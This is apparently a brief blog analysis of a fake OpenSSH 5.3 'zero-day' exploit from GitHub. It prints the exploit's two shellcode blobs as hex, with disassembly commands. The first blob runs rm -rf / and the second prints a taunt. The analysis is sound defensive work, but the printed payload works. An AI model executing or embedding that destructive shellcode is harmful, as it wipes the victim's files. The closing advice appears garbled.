Analyze A Fake OpenSSH 5.3 0day Exploit
Just a normal day of work, I’m searching for vulnerability about OpenSSH 5.3. Surprisingly, there is an RCE 0day exploit on Github. I take a look at the exploit code before I compile it. Strangely, the exploit code is so simple especially the shellcode.
There are two shellcode in the exploit. I wrote some comments with assembly code.
python -c 'print "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"' > decoder.bin
objdump -D -b binary -M intel -m i386 decoder.bin
python -c 'print "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80"' > rootshell.bin
objdump -D -b binary -M intel -m i386 rootshell.bin
That’s all. A fake 0day exploit.
After some searching, I found an older post from pastbin and another people’s analysis blog. Also, there was already an issue on GitHub reference to the same blog. It seems like I’m too involved in the research without searching for some related information first :)
All in all, it is a short relaxing moment on Monday’s working hours. Use the exploit before you read it and understanding it.
BTW, no RCE exploit TAT.